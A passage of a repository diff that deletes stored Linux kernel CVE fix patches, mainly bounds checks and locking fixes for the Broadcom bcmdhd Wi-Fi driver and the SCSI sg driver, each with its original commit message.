-index 4e5fee0..140a20d 100644
---- a/drivers/net/wireless/bcmdhd/wl_cfgvendor.c
-+++ b/drivers/net/wireless/bcmdhd/wl_cfgvendor.c
-@@ -1158,106 +1158,6 @@ static int wl_cfgvendor_set_batch_scan_cfg(struct wiphy *wiphy,
- 	return err;
- }
- 
--static int wl_cfgvendor_significant_change_cfg(struct wiphy *wiphy,
--	struct wireless_dev *wdev, const void  *data, int len)
--{
--	int err = 0;
--	struct bcm_cfg80211 *cfg = wiphy_priv(wiphy);
--	gscan_swc_params_t *significant_params;
--	int tmp, tmp1, tmp2, type, j = 0;
--	const struct nlattr *outer, *inner, *iter;
--	bool flush = FALSE;
--	wl_pfn_significant_bssid_t *pbssid;
--	uint16 num_bssid = 0;
--	uint16 max_buf_size = sizeof(gscan_swc_params_t) +
--		sizeof(wl_pfn_significant_bssid_t) * (PFN_SWC_MAX_NUM_APS - 1);
--
--	significant_params = kzalloc(max_buf_size, GFP_KERNEL);
--
--	if (!significant_params) {
--		WL_ERR(("Cannot Malloc mem size:%d\n", len));
--		return BCME_NOMEM;
--	}
--
--
--	nla_for_each_attr(iter, data, len, tmp2) {
--		type = nla_type(iter);
--
--		switch (type) {
--			case GSCAN_ATTRIBUTE_SIGNIFICANT_CHANGE_FLUSH:
--			flush = (bool) nla_get_u8(iter);
--			break;
--			case GSCAN_ATTRIBUTE_RSSI_SAMPLE_SIZE:
--				significant_params->rssi_window = nla_get_u16(iter);
--				break;
--			case GSCAN_ATTRIBUTE_LOST_AP_SAMPLE_SIZE:
--				significant_params->lost_ap_window = nla_get_u16(iter);
--				break;
--			case GSCAN_ATTRIBUTE_MIN_BREACHING:
--				significant_params->swc_threshold = nla_get_u16(iter);
--				break;
--			case GSCAN_ATTRIBUTE_NUM_BSSID:
--				num_bssid = nla_get_u16(iter);
--				if (num_bssid > PFN_SWC_MAX_NUM_APS) {
--					WL_ERR(("ovar max SWC bssids:%d\n",
--						num_bssid));
--					err = BCME_BADARG;
--					goto exit;
--				}
--				break;
--			case GSCAN_ATTRIBUTE_SIGNIFICANT_CHANGE_BSSIDS:
--				if (num_bssid == 0) {
--					WL_ERR(("num_bssid : 0\n"));
--					err = BCME_BADARG;
--					goto exit;
--				}
--				pbssid = significant_params->bssid_elem_list;
--				nla_for_each_nested(outer, iter, tmp) {
--					if (j >= num_bssid) {
--						j++;
--						break;
--					}
--					nla_for_each_nested(inner, outer, tmp1) {
--							switch (nla_type(inner)) {
--								case GSCAN_ATTRIBUTE_BSSID:
--								memcpy(&(pbssid[j].macaddr),
--								     nla_data(inner),
--								     ETHER_ADDR_LEN);
--								break;
--								case GSCAN_ATTRIBUTE_RSSI_HIGH:
--								pbssid[j].rssi_high_threshold =
--								       (int8) nla_get_u8(inner);
--								break;
--								case GSCAN_ATTRIBUTE_RSSI_LOW:
--								pbssid[j].rssi_low_threshold =
--								      (int8) nla_get_u8(inner);
--								break;
--							}
--						}
--					j++;
--				}
--				break;
--		}
--	}
--	if (j != num_bssid) {
--		WL_ERR(("swc bssids count:%d not matched to num_bssid:%d\n",
--			j, num_bssid));
--		err = BCME_BADARG;
--		goto exit;
--	}
--	significant_params->nbssid = j;
--
--	if (dhd_dev_pno_set_cfg_gscan(bcmcfg_to_prmry_ndev(cfg),
--	    DHD_PNO_SIGNIFICANT_SCAN_CFG_ID, significant_params, flush) < 0) {
--		WL_ERR(("Could not set GSCAN significant cfg\n"));
--		err = -EINVAL;
--		goto exit;
--	}
--exit:
--	kfree(significant_params);
--	return err;
--}
--
- static int wl_cfgvendor_enable_lazy_roam(struct wiphy *wiphy,
- 	struct wireless_dev *wdev, const void  *data, int len)
- {
-@@ -3013,14 +2913,6 @@ static const struct wiphy_vendor_command wl_vendor_cmds [] = {
- 	{
- 		{
- 			.vendor_id = OUI_GOOGLE,
--			.subcmd = GSCAN_SUBCMD_SET_SIGNIFICANT_CHANGE_CONFIG
--		},
--		.flags = WIPHY_VENDOR_CMD_NEED_WDEV | WIPHY_VENDOR_CMD_NEED_NETDEV,
--		.doit = wl_cfgvendor_significant_change_cfg
--	},
--	{
--		{
--			.vendor_id = OUI_GOOGLE,
- 			.subcmd = GSCAN_SUBCMD_GET_SCAN_RESULTS
- 		},
- 		.flags = WIPHY_VENDOR_CMD_NEED_WDEV | WIPHY_VENDOR_CMD_NEED_NETDEV,
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0790/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0790/ANY/0001.patch
deleted file mode 100644
index b155460d..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0790/ANY/0001.patch
+++ /dev/null
@@ -1,173 +0,0 @@
-From 5575ff40a53a954ec942ff0c17b193433e72c132 Mon Sep 17 00:00:00 2001
-From: Sudhir Kohalli <sudhir.kohalli@broadcom.com>
-Date: Wed, 14 Jun 2017 11:36:22 -0700
-Subject: net: wireless: bcmdhd: add boundary check in GSCAN full result
- handler
-
-validtating each length fields before not to overflow allocated
-data type. it prevent possiblity heap memory corrupted.
-
-Signed-off-by: Sudhir Kohalli <sudhir.kohalli@broadcom.com>
-Bug: 37357704
-Change-Id: I7c04b93f3843c8100bd932fb9b7c67ef76b93050
----
- drivers/net/wireless/bcmdhd/dhd_linux.c   |  5 +++--
- drivers/net/wireless/bcmdhd/dhd_pno.c     | 37 ++++++++++++++++++++++++-------
- drivers/net/wireless/bcmdhd/dhd_pno.h     |  7 +++---
- drivers/net/wireless/bcmdhd/wl_cfg80211.c |  7 ++++--
- 4 files changed, 41 insertions(+), 15 deletions(-)
-
-diff --git a/drivers/net/wireless/bcmdhd/dhd_linux.c b/drivers/net/wireless/bcmdhd/dhd_linux.c
-index 0b66e91..abc4331 100644
---- a/drivers/net/wireless/bcmdhd/dhd_linux.c
-+++ b/drivers/net/wireless/bcmdhd/dhd_linux.c
-@@ -8420,11 +8420,12 @@ void * dhd_dev_hotlist_scan_event(struct net_device *dev,
- 
- /* Linux wrapper to call common dhd_process_full_gscan_result */
- void * dhd_dev_process_full_gscan_result(struct net_device *dev,
--const void  *data, int *send_evt_bytes)
-+const void  *data, uint32 len, int *send_evt_bytes)
- {
- 	dhd_info_t *dhd = *(dhd_info_t **)netdev_priv(dev);
- 
--	return (dhd_process_full_gscan_result(&dhd->pub, data, send_evt_bytes));
-+	return dhd_process_full_gscan_result(&dhd->pub, data, len,
-+			send_evt_bytes);
- }
- 
- void dhd_dev_gscan_hotlist_cache_cleanup(struct net_device *dev, hotlist_type_t type)
-diff --git a/drivers/net/wireless/bcmdhd/dhd_pno.c b/drivers/net/wireless/bcmdhd/dhd_pno.c
-index c80adec..3103f89 100644
---- a/drivers/net/wireless/bcmdhd/dhd_pno.c
-+++ b/drivers/net/wireless/bcmdhd/dhd_pno.c
-@@ -47,6 +47,7 @@
- #ifdef GSCAN_SUPPORT
- #include <linux/gcd.h>
- #endif /* GSCAN_SUPPORT */
-+#include <wl_cfg80211.h>
- 
- #ifdef __BIG_ENDIAN
- #include <bcmendian.h>
-@@ -3693,7 +3694,8 @@ void dhd_gscan_hotlist_cache_cleanup(dhd_pub_t *dhd, hotlist_type_t type)
- }
- 
- void *
--dhd_process_full_gscan_result(dhd_pub_t *dhd, const void *data, int *size)
-+dhd_process_full_gscan_result(dhd_pub_t *dhd, const void *data, uint32 len,
-+			      int *size)
- {
- 	wl_bss_info_t *bi = NULL;
- 	wl_gscan_result_t *gscan_result;
-@@ -3702,15 +3704,25 @@ dhd_process_full_gscan_result(dhd_pub_t *dhd, const void *data, int *size)
- 	uint8 channel;
- 	uint32 mem_needed;
- 	struct timespec ts;
-+	u32 bi_ie_length = 0;
-+	u32 bi_ie_offset = 0;
- 
- 	*size = 0;
--
- 	gscan_result = (wl_gscan_result_t *)data;
--
- 	if (!gscan_result) {
- 		DHD_ERROR(("Invalid gscan result (NULL pointer)\n"));
- 		goto exit;
- 	}
-+
-+	if ((len < sizeof(*gscan_result)) ||
-+	    (len < dtoh32(gscan_result->buflen)) ||
-+	    (dtoh32(gscan_result->buflen) >
-+	    (sizeof(*gscan_result) + WL_SCAN_IE_LEN_MAX))) {
-+		DHD_ERROR(("%s: invalid gscan buflen:%u\n", __func__,
-+			   dtoh32(gscan_result->buflen)));
-+		goto exit;
-+	}
-+
- 	if (!gscan_result->bss_info) {
- 		DHD_ERROR(("Invalid gscan bss info (NULL pointer)\n"));
- 		goto exit;
-@@ -3722,12 +3734,21 @@ dhd_process_full_gscan_result(dhd_pub_t *dhd, const void *data, int *size)
- 		DHD_ERROR(("Invalid bss_info length %d: ignoring\n", bi_length));
- 		goto exit;
- 	}
-+
-+	bi_ie_offset = dtoh32(bi->ie_offset);
-+	bi_ie_length = dtoh32(bi->ie_length);
-+	if ((bi_ie_offset + bi_ie_length) > bi_length) {
-+		DHD_ERROR(("%s: Invalid ie_length:%u or ie_offset:%u\n",
-+			   __func__, bi_ie_length, bi_ie_offset));
-+		goto exit;
-+	}
- 	if (bi->SSID_len > DOT11_MAX_SSID_LEN) {
--		DHD_ERROR(("Invalid SSID length %d: trimming it to max\n", bi->SSID_len));
--		bi->SSID_len = DOT11_MAX_SSID_LEN;
-+		DHD_ERROR(("%s: Invalid SSID length %u\n",
-+			   __func__, bi->SSID_len));
-+		goto exit;
- 	}
- 
--	mem_needed = OFFSETOF(wifi_gscan_full_result_t, ie_data) + bi->ie_length;
-+	mem_needed = OFFSETOF(wifi_gscan_full_result_t, ie_data) + bi_ie_length;
- 	result = (wifi_gscan_full_result_t *) kmalloc(mem_needed, GFP_KERNEL);
- 
- 	if (!result) {
-@@ -3749,9 +3770,9 @@ dhd_process_full_gscan_result(dhd_pub_t *dhd, const void *data, int *size)
- 	result->fixed.ts = (uint64) TIMESPEC_TO_US(ts);
- 	result->fixed.beacon_period = dtoh16(bi->beacon_period);
- 	result->fixed.capability = dtoh16(bi->capability);
--	result->ie_length = dtoh32(bi->ie_length);
-+	result->ie_length = bi_ie_length;
- 	memcpy(&result->fixed.macaddr, &bi->BSSID, ETHER_ADDR_LEN);
--	memcpy(result->ie_data, ((uint8 *)bi + bi->ie_offset), bi->ie_length);
-+	memcpy(result->ie_data, ((uint8 *)bi + bi_ie_offset), bi_ie_length);
- 	*size = mem_needed;
- exit:
- 	return result;
-diff --git a/drivers/net/wireless/bcmdhd/dhd_pno.h b/drivers/net/wireless/bcmdhd/dhd_pno.h
-index a0edf54..3398752 100644
---- a/drivers/net/wireless/bcmdhd/dhd_pno.h
-+++ b/drivers/net/wireless/bcmdhd/dhd_pno.h
-@@ -512,7 +512,7 @@ int dhd_retreive_batch_scan_results(dhd_pub_t *dhd);
- extern void * dhd_dev_hotlist_scan_event(struct net_device *dev,
-                          const void  *data, int *send_evt_bytes, hotlist_type_t type);
- void * dhd_dev_process_full_gscan_result(struct net_device *dev,
--                                        const void  *data, int *send_evt_bytes);
-+			const void  *data, uint32 len, int *send_evt_bytes);
- extern int dhd_dev_gscan_batch_cache_cleanup(struct net_device *dev);
- extern void dhd_dev_gscan_hotlist_cache_cleanup(struct net_device *dev, hotlist_type_t type);
- extern int dhd_dev_wait_batch_results_complete(struct net_device *dev);
-@@ -563,8 +563,9 @@ extern int dhd_dev_retrieve_batch_scan(struct net_device *dev);
- extern void *dhd_handle_swc_evt(dhd_pub_t *dhd, const void *event_data, int *send_evt_bytes);
- extern void *dhd_handle_hotlist_scan_evt(dhd_pub_t *dhd, const void *event_data,
-                        int *send_evt_bytes, hotlist_type_t type);
--extern void *dhd_process_full_gscan_result(dhd_pub_t *dhd, const void *event_data,
--                       int *send_evt_bytes);
-+extern void *
-+dhd_process_full_gscan_result(dhd_pub_t *dhd, const void *event_data,
-+			      uint32 len, int *send_evt_bytes);
- extern int dhd_gscan_batch_cache_cleanup(dhd_pub_t *dhd);
- extern void dhd_gscan_hotlist_cache_cleanup(dhd_pub_t *dhd, hotlist_type_t type);
- extern int dhd_wait_batch_results_complete(dhd_pub_t *dhd);
-diff --git a/drivers/net/wireless/bcmdhd/wl_cfg80211.c b/drivers/net/wireless/bcmdhd/wl_cfg80211.c
-index d8c748d..1d1e2a8 100644
---- a/drivers/net/wireless/bcmdhd/wl_cfg80211.c
-+++ b/drivers/net/wireless/bcmdhd/wl_cfg80211.c
-@@ -9452,10 +9452,13 @@ wl_notify_gscan_event(struct bcm_cfg80211 *cfg, bcm_struct_cfgdev *cfgdev,
- 				err = -EINVAL;
- 			break;
- 		case WLC_E_PFN_GSCAN_FULL_RESULT:
--			ptr = dhd_dev_process_full_gscan_result(ndev, data, &send_evt_bytes);
-+			ptr =
-+			dhd_dev_process_full_gscan_result(ndev, data, len,
-+							  &send_evt_bytes);
- 			if (ptr) {
- 				wl_cfgvendor_send_async_event(wiphy, ndev,
--				    GOOGLE_SCAN_FULL_RESULTS_EVENT, ptr, send_evt_bytes);
-+				    GOOGLE_SCAN_FULL_RESULTS_EVENT, ptr,
-+				    send_evt_bytes);
- 				kfree(ptr);
- 			} else
- 				err = -ENOMEM;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0791/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0791/ANY/0001.patch
deleted file mode 100644
index 437310a9..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0791/ANY/0001.patch
+++ /dev/null
@@ -1,53 +0,0 @@
-From 2935fde98001eca0f8dafad827933ce60d44ffba Mon Sep 17 00:00:00 2001
-From: Insun Song <insun.song@broadcom.com>
-Date: Wed, 24 May 2017 09:21:02 -0700
-Subject: net: wireless: bcmdhd: adding boundary check in
- wl_notify_rx_mgmt_frame
-
-added boundary check for input parameters not to corrupt kernel heap in
-case user injected malformed input
-
-Signed-off-by: Insun Song <insun.song@broadcom.com>
-Bug: 37306719
-Change-Id: I6dc12e9bcfce8f3b43ecf14bfd6976bf87afeaa5
----
- drivers/net/wireless/bcmdhd/wl_cfg80211.c | 14 ++++++++++++--
- 1 file changed, 12 insertions(+), 2 deletions(-)
-
-diff --git a/drivers/net/wireless/bcmdhd/wl_cfg80211.c b/drivers/net/wireless/bcmdhd/wl_cfg80211.c
-index 842091f..021f69f7 100644
---- a/drivers/net/wireless/bcmdhd/wl_cfg80211.c
-+++ b/drivers/net/wireless/bcmdhd/wl_cfg80211.c
-@@ -9657,9 +9657,15 @@ wl_notify_rx_mgmt_frame(struct bcm_cfg80211 *cfg, bcm_struct_cfgdev *cfgdev,
- 	u32 event = ntoh32(e->event_type);
- 	u8 *mgmt_frame;
- 	u8 bsscfgidx = e->bsscfgidx;
--	u32 mgmt_frame_len = ntoh32(e->datalen) - sizeof(wl_event_rx_frame_data_t);
-+	u32 mgmt_frame_len = ntoh32(e->datalen);
- 	u16 channel = ((ntoh16(rxframe->channel) & WL_CHANSPEC_CHAN_MASK));
- 
-+	if (mgmt_frame_len < sizeof(wl_event_rx_frame_data_t)) {
-+		WL_ERR(("wrong datalen:%d\n", mgmt_frame_len));
-+		return -EINVAL;
-+	}
-+	mgmt_frame_len -= sizeof(wl_event_rx_frame_data_t);
-+
- 	memset(&bssid, 0, ETHER_ADDR_LEN);
- 
- 	ndev = cfgdev_to_wlc_ndev(cfgdev, cfg);
-@@ -9781,7 +9787,11 @@ wl_notify_rx_mgmt_frame(struct bcm_cfg80211 *cfg, bcm_struct_cfgdev *cfgdev,
- 		WL_DBG((" Event WLC_E_PROBREQ_MSG received\n"));
- 		mgmt_frame = (u8 *)(data);
- 		mgmt_frame_len = ntoh32(e->datalen);
--
-+		if (mgmt_frame_len < DOT11_MGMT_HDR_LEN) {
-+			WL_ERR(("WLC_E_PROBREQ_MSG - wrong datalen:%d\n",
-+				mgmt_frame_len));
-+			return -EINVAL;
-+		}
- 		prbreq_ie_len = mgmt_frame_len - DOT11_MGMT_HDR_LEN;
- 
- 		/* Parse prob_req IEs */
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0792/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0792/ANY/0001.patch
deleted file mode 100644
index 839c4b1d..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0792/ANY/0001.patch
+++ /dev/null
@@ -1,45 +0,0 @@
-From f35ce58f516c15c022745d687bb1c59ffab63293 Mon Sep 17 00:00:00 2001
-From: Insun Song <insun.song@broadcom.com>
-Date: Wed, 24 May 2017 10:11:27 -0700
-Subject: net: wireless: bcmdhd: add boundary check in dhd_rtt_event_handler
-
-added boundary check for input parameters not to corrupt kernel heap in
-case user injected malformed input
-
-Signed-off-by: Insun Song <insun.song@broadcom.com>
-Bug: 37305578
-Change-Id: I92114d7166fb68d8d97b33ea214f80e8917794d1
----
- drivers/net/wireless/bcmdhd/dhd_rtt.c | 9 +++++++++
- 1 file changed, 9 insertions(+)
-
-diff --git a/drivers/net/wireless/bcmdhd/dhd_rtt.c b/drivers/net/wireless/bcmdhd/dhd_rtt.c
-index 371328a..34b05be 100644
---- a/drivers/net/wireless/bcmdhd/dhd_rtt.c
-+++ b/drivers/net/wireless/bcmdhd/dhd_rtt.c
-@@ -1696,6 +1696,10 @@ dhd_rtt_event_handler(dhd_pub_t *dhd, wl_event_msg_t *event, void *event_data)
- 			return ret;
- 		}
- 	}
-+	if (!event_data) {
-+		DHD_ERROR(("%s: event_data:NULL\n", __FUNCTION__));
-+		return -EINVAL;
-+	}
- 	p_event = (wl_proxd_event_t *) event_data;
- 	version = ltoh16(p_event->version);
- 	if (version < WL_PROXD_API_VERSION) {
-@@ -1718,6 +1722,11 @@ dhd_rtt_event_handler(dhd_pub_t *dhd, wl_event_msg_t *event, void *event_data)
- 		goto exit;	/* ignore this event */
- 	}
- 	/* get TLVs len, skip over event header */
-+	if (ltoh16(p_event->len) < OFFSETOF(wl_proxd_event_t, tlvs)) {
-+		DHD_ERROR(("invalid FTM event length:%d\n", ltoh16(p_event->len)));
-+		ret = -EINVAL;
-+		goto exit;
-+	}
- 	tlvs_len = ltoh16(p_event->len) - OFFSETOF(wl_proxd_event_t, tlvs);
- 	DHD_RTT(("receive '%s' event: version=0x%x len=%d method=%d sid=%d tlvs_len=%d\n",
- 		p_loginfo->text,
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0794/ANY/0001.patch.disabled b/Patches/Linux_CVEs/CVE-2017-0794/ANY/0001.patch.disabled
deleted file mode 100644
index 2857497f..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0794/ANY/0001.patch.disabled
+++ /dev/null
@@ -1,164 +0,0 @@
-From 47b3a105cc4cec0d912345d27d9743b97691b21c Mon Sep 17 00:00:00 2001
-From: Robb Glasser <rglasser@google.com>
-Date: Fri, 24 Mar 2017 16:23:37 -0700
-Subject: [PATCH] Prevent potential double frees in sg driver
-
-sg_ioctl could be spammed by requests, leading to a double free in
-__free_pages. This protects the entry points of sg_ioctl where the
-memory could be corrupted by a double call to __free_pages if multiple
-requests are happening concurrently.
-
-Bug:35644812
-
-Change-Id: Ie13f65beb6974430f90292e2742841b26aecb8b1
-Signed-off-by: Robb Glasser <rglasser@google.com>
----
- drivers/scsi/sg.c | 34 ++++++++++++++++++++--------------
- 1 file changed, 20 insertions(+), 14 deletions(-)
-
-diff --git a/drivers/scsi/sg.c b/drivers/scsi/sg.c
-index 721d839d6c543..9a600f05ab57a 100644
---- a/drivers/scsi/sg.c
-+++ b/drivers/scsi/sg.c
-@@ -486,7 +486,7 @@ sg_read(struct file *filp, char __user *buf, size_t count, loff_t * ppos)
- 		old_hdr->result = EIO;
- 		break;
- 	case DID_ERROR:
--		old_hdr->result = (srp->sense_b[0] == 0 && 
-+		old_hdr->result = (srp->sense_b[0] == 0 &&
- 				  hp->masked_status == GOOD) ? 0 : EIO;
- 		break;
- 	default:
-@@ -832,8 +832,10 @@ sg_ioctl(struct file *filp, unsigned int cmd_in, unsigned long arg)
- 			return -ENXIO;
- 		if (!access_ok(VERIFY_WRITE, p, SZ_SG_IO_HDR))
- 			return -EFAULT;
-+		mutex_lock(&sfp->parentdp->open_rel_lock);
- 		result = sg_new_write(sfp, filp, p, SZ_SG_IO_HDR,
- 				 1, read_only, 1, &srp);
-+		mutex_unlock(&sfp->parentdp->open_rel_lock);
- 		if (result < 0)
- 			return result;
- 		result = wait_event_interruptible(sfp->read_wait,
-@@ -873,8 +875,10 @@ sg_ioctl(struct file *filp, unsigned int cmd_in, unsigned long arg)
- 			sfp->low_dma = 1;
- 			if ((0 == sfp->low_dma) && (0 == sg_res_in_use(sfp))) {
- 				val = (int) sfp->reserve.bufflen;
-+				mutex_lock(&sfp->parentdp->open_rel_lock);
- 				sg_remove_scat(&sfp->reserve);
- 				sg_build_reserve(sfp, val);
-+				mutex_unlock(&sfp->parentdp->open_rel_lock);
- 			}
- 		} else {
- 			if (sdp->detached)
-@@ -942,15 +946,17 @@ sg_ioctl(struct file *filp, unsigned int cmd_in, unsigned long arg)
- 		result = get_user(val, ip);
- 		if (result)
- 			return result;
--                if (val < 0)
--                        return -EINVAL;
-+		if (val < 0)
-+			return -EINVAL;
- 		val = min_t(int, val,
- 			    queue_max_sectors(sdp->device->request_queue) * 512);
- 		if (val != sfp->reserve.bufflen) {
- 			if (sg_res_in_use(sfp) || sfp->mmap_called)
- 				return -EBUSY;
-+			mutex_lock(&sfp->parentdp->open_rel_lock);
- 			sg_remove_scat(&sfp->reserve);
- 			sg_build_reserve(sfp, val);
-+			mutex_unlock(&sfp->parentdp->open_rel_lock);
- 		}
- 		return 0;
- 	case SG_GET_RESERVED_SIZE:
-@@ -1003,8 +1009,8 @@ sg_ioctl(struct file *filp, unsigned int cmd_in, unsigned long arg)
- 				if (srp) {
- 					rinfo[val].req_state = srp->done + 1;
- 					rinfo[val].problem =
--					    srp->header.masked_status & 
--					    srp->header.host_status & 
-+					    srp->header.masked_status &
-+					    srp->header.host_status &
- 					    srp->header.driver_status;
- 					if (srp->done)
- 						rinfo[val].duration =
-@@ -1025,7 +1031,7 @@ sg_ioctl(struct file *filp, unsigned int cmd_in, unsigned long arg)
- 				}
- 			}
- 			read_unlock_irqrestore(&sfp->rq_list_lock, iflags);
--			result = __copy_to_user(p, rinfo, 
-+			result = __copy_to_user(p, rinfo,
- 						SZ_SG_REQ_INFO * SG_MAX_QUEUE);
- 			result = result ? -EFAULT : 0;
- 			kfree(rinfo);
-@@ -1127,14 +1133,14 @@ static long sg_compat_ioctl(struct file *filp, unsigned int cmd_in, unsigned lon
- 		return -ENXIO;
- 
- 	sdev = sdp->device;
--	if (sdev->host->hostt->compat_ioctl) { 
-+	if (sdev->host->hostt->compat_ioctl) {
- 		int ret;
- 
- 		ret = sdev->host->hostt->compat_ioctl(sdev, cmd_in, (void __user *)arg);
- 
- 		return ret;
- 	}
--	
-+
- 	return -ENOIOCTLCMD;
- }
- #endif
-@@ -1594,7 +1600,7 @@ init_sg(void)
- 	else
- 		def_reserved_size = sg_big_buff;
- 
--	rc = register_chrdev_region(MKDEV(SCSI_GENERIC_MAJOR, 0), 
-+	rc = register_chrdev_region(MKDEV(SCSI_GENERIC_MAJOR, 0),
- 				    SG_MAX_DEVS, "sg");
- 	if (rc)
- 		return rc;
-@@ -2234,7 +2240,7 @@ static const struct file_operations adio_fops = {
- };
- 
- static int sg_proc_single_open_dressz(struct inode *inode, struct file *file);
--static ssize_t sg_proc_write_dressz(struct file *filp, 
-+static ssize_t sg_proc_write_dressz(struct file *filp,
- 		const char __user *buffer, size_t count, loff_t *off);
- static const struct file_operations dressz_fops = {
- 	.owner = THIS_MODULE,
-@@ -2374,7 +2380,7 @@ static int sg_proc_single_open_adio(struct inode *inode, struct file *file)
- 	return single_open(file, sg_proc_seq_show_int, &sg_allow_dio);
- }
- 
--static ssize_t 
-+static ssize_t
- sg_proc_write_adio(struct file *filp, const char __user *buffer,
- 		   size_t count, loff_t *off)
- {
-@@ -2395,7 +2401,7 @@ static int sg_proc_single_open_dressz(struct inode *inode, struct file *file)
- 	return single_open(file, sg_proc_seq_show_int, &sg_big_buff);
- }
- 
--static ssize_t 
-+static ssize_t
- sg_proc_write_dressz(struct file *filp, const char __user *buffer,
- 		     size_t count, loff_t *off)
- {
-@@ -2552,7 +2558,7 @@ static void sg_proc_debug_helper(struct seq_file *s, Sg_device * sdp)
- 			hp = &srp->header;
- 			new_interface = (hp->interface_id == '\0') ? 0 : 1;
- 			if (srp->res_used) {
--				if (new_interface && 
-+				if (new_interface &&
- 				    (SG_FLAG_MMAP_IO & hp->flags))
- 					cp = "     mmap>> ";
- 				else
-@@ -2566,7 +2572,7 @@ static void sg_proc_debug_helper(struct seq_file *s, Sg_device * sdp)
- 			seq_printf(s, cp);
- 			blen = srp->data.bufflen;
- 			usg = srp->data.k_use_sg;
--			seq_printf(s, srp->done ? 
-+			seq_printf(s, srp->done ?
- 				   ((1 == srp->done) ?  "rcv:" : "fin:")
- 				   : "act:");
- 			seq_printf(s, " id=%d blen=%d",
diff --git a/Patches/Linux_CVEs/CVE-2017-0824/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0824/ANY/0001.patch
deleted file mode 100644
index 02283a8b..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0824/ANY/0001.patch
+++ /dev/null
@@ -1,105 +0,0 @@
-From 3d6c7b39db34369e28b0581be26f57e9467f8408 Mon Sep 17 00:00:00 2001
-From: Insun Song <insun.song@broadcom.com>
-Date: Fri, 7 Jul 2017 14:53:03 -0700
-Subject: net: wireless: bcmdhd: remove SDIO debug IOVARs causing out of bounds
-
-"sd_devreg" IOVAR can cause out of bounds access when user input
-manipulated. Proposed fix is removing debug oriented IOVARs completely.
-
-Signed-off-by: Insun Song <insun.song@broadcom.com>
-Bug: 37622847
-Change-Id: I8fc5111fe9d8d2c5d7ae5b1c24ae8e531113beae
----
- drivers/net/wireless/bcmdhd/bcmsdh_sdmmc.c | 69 ------------------------------
- 1 file changed, 69 deletions(-)
-
-diff --git a/drivers/net/wireless/bcmdhd/bcmsdh_sdmmc.c b/drivers/net/wireless/bcmdhd/bcmsdh_sdmmc.c
-index 427298f..a440998 100644
---- a/drivers/net/wireless/bcmdhd/bcmsdh_sdmmc.c
-+++ b/drivers/net/wireless/bcmdhd/bcmsdh_sdmmc.c
-@@ -406,8 +406,6 @@ const bcm_iovar_t sdioh_iovars[] = {
- 	{"sd_ints", 	IOV_USEINTS,	0,	IOVT_BOOL,	0 },
- 	{"sd_numints",	IOV_NUMINTS,	0,	IOVT_UINT32,	0 },
- 	{"sd_numlocalints", IOV_NUMLOCALINTS, 0, IOVT_UINT32,	0 },
--	{"sd_hostreg",	IOV_HOSTREG,	0,	IOVT_BUFFER,	sizeof(sdreg_t) },
--	{"sd_devreg",	IOV_DEVREG, 	0,	IOVT_BUFFER,	sizeof(sdreg_t) },
- 	{"sd_divisor",	IOV_DIVISOR,	0,	IOVT_UINT32,	0 },
- 	{"sd_power",	IOV_POWER,	0,	IOVT_UINT32,	0 },
- 	{"sd_clock",	IOV_CLOCK,	0,	IOVT_UINT32,	0 },
-@@ -608,73 +606,6 @@ sdioh_iovar_op(sdioh_info_t *si, const char *name,
- 		bcopy(&int_val, arg, sizeof(int_val));
- 		break;
- 
--	case IOV_GVAL(IOV_HOSTREG):
--	{
--		sdreg_t *sd_ptr = (sdreg_t *)params;
--
--		if (sd_ptr->offset < SD_SysAddr || sd_ptr->offset > SD_MaxCurCap) {
--			sd_err(("%s: bad offset 0x%x\n", __FUNCTION__, sd_ptr->offset));
--			bcmerror = BCME_BADARG;
--			break;
--		}
--
--		sd_trace(("%s: rreg%d at offset %d\n", __FUNCTION__,
--		                  (sd_ptr->offset & 1) ? 8 : ((sd_ptr->offset & 2) ? 16 : 32),
--		                  sd_ptr->offset));
--		if (sd_ptr->offset & 1)
--			int_val = 8; /* sdioh_sdmmc_rreg8(si, sd_ptr->offset); */
--		else if (sd_ptr->offset & 2)
--			int_val = 16; /* sdioh_sdmmc_rreg16(si, sd_ptr->offset); */
--		else
--			int_val = 32; /* sdioh_sdmmc_rreg(si, sd_ptr->offset); */
--
--		bcopy(&int_val, arg, sizeof(int_val));
--		break;
--	}
--
--	case IOV_SVAL(IOV_HOSTREG):
--	{
--		sdreg_t *sd_ptr = (sdreg_t *)params;
--
--		if (sd_ptr->offset < SD_SysAddr || sd_ptr->offset > SD_MaxCurCap) {
--			sd_err(("%s: bad offset 0x%x\n", __FUNCTION__, sd_ptr->offset));
--			bcmerror = BCME_BADARG;
--			break;
--		}
--
--		sd_trace(("%s: wreg%d value 0x%08x at offset %d\n", __FUNCTION__, sd_ptr->value,
--		                  (sd_ptr->offset & 1) ? 8 : ((sd_ptr->offset & 2) ? 16 : 32),
--		                  sd_ptr->offset));
--		break;
--	}
--
--	case IOV_GVAL(IOV_DEVREG):
--	{
--		sdreg_t *sd_ptr = (sdreg_t *)params;
--		uint8 data = 0;
--
--		if (sdioh_cfg_read(si, sd_ptr->func, sd_ptr->offset, &data)) {
--			bcmerror = BCME_SDIO_ERROR;
--			break;
--		}
--
--		int_val = (int)data;
--		bcopy(&int_val, arg, sizeof(int_val));
--		break;
--	}
--
--	case IOV_SVAL(IOV_DEVREG):
--	{
--		sdreg_t *sd_ptr = (sdreg_t *)params;
--		uint8 data = (uint8)sd_ptr->value;
--
--		if (sdioh_cfg_write(si, sd_ptr->func, sd_ptr->offset, &data)) {
--			bcmerror = BCME_SDIO_ERROR;
--			break;
--		}
--		break;
--	}
--
- 	default:
- 		bcmerror = BCME_UNSUPPORTED;
- 		break;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0825/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0825/ANY/0001.patch
deleted file mode 100644
index c058b66f..00000000
